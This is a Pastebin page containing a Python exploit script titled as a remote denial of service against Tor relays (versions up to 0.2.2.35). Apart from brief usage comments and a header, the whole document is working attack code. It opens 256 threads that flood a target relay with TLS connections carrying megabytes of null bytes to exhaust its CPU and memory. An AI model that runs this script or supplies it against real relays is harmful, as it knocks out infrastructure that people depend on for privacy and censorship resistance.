Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/python
- # Exploit Title: Tor relay remote denial of service
- # Date: 12-04-2012
- # Software link: https://www.torproject.org/
- # Version: <= 0.2.2.35
- # Tested on: Linux
- #
- # This code has 2 effects :
- # - Imediatly incrase the CPU usage of the server to ~ 100 %
- # - Hudge memory usage, if the ratio bandwich / RAM is higth this code can make Tor use all the avaiable memory and crash (works great on 127.0.0.1)
- #
- # Usage: python exploit.py host port
- # Exemple: python exploit.py localhost 9001
- import socket, ssl
- import time
- import os
- import threading
- import sys
- import random
- if len(sys.argv) != 3 or not sys.argv[2].isdigit():
- sys.stderr.write(" Usage : " + sys.argv[0] + " host port\n")
- os._exit(-1)
- t0 = time.time()
- buff = chr(0) * 1000000
- target = (sys.argv[1], int(sys.argv[2]))
- error = 0
- class Error:
- def __init__(self):
- self.count = 0
- self.lock = threading.Lock()
- def error(self, msg, pound):
- self.lock.acquire()
- print " [!] Error : " + msg
- self.count += pound
- if self.count > 42:
- print " [!] Too many errors ! (Server may be down)"
- print " [+] Exiting ..."
- os._exit(0)
- self.lock.release()
- def flood(target, err):
- while True:
- try:
- try:
- sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
- sock.connect(target)
- ssl_sock = ssl.wrap_socket(sock)
- ssl_sock.do_handshake()
- except:
- err.error("Can not connect", 1)
- while True:
- ssl_sock.sendall(buff) # Yes, we just send ssl-zipped 0x00 ...
- except:
- err.error("Socket reset (server timeout)", 0)
- threads = []
- err = Error()
- for i in range(256):
- print " [+] starting a new thread"
- threads.append(threading.Thread(target = flood, args = [target, err]))
- threads[i].start()
- if i < 20:
- time.sleep(1)
- elif i < 128:
- time.sleep(3 + random.random())
- else:
- time.sleep(7 + random.random())
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement